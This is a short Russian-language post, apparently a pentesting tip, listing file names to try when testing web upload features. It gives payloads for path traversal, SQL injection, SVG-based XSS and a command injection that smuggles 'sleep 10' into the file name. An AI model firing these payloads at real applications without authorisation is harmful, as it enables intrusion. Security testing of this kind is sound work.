​​📨 Получение других уязвимостей при загрузке файла



При тестировании функций загрузки файлов в веб-приложении попробуйте установить для имени файла следующие значения:



▫️ ../../../tmp/lol.png -> для уязвимости Path Traversal

▫️ sleep(10)-- -.jpg -> для SQL-инъекции

▫️ <svg onload=alert(document.domain)>.jpg/png -> для XSS

▫️ ; sleep 10; -> для command injection



Эти полезные нагрузки могут вызвать дополнительные уязвимости.



#web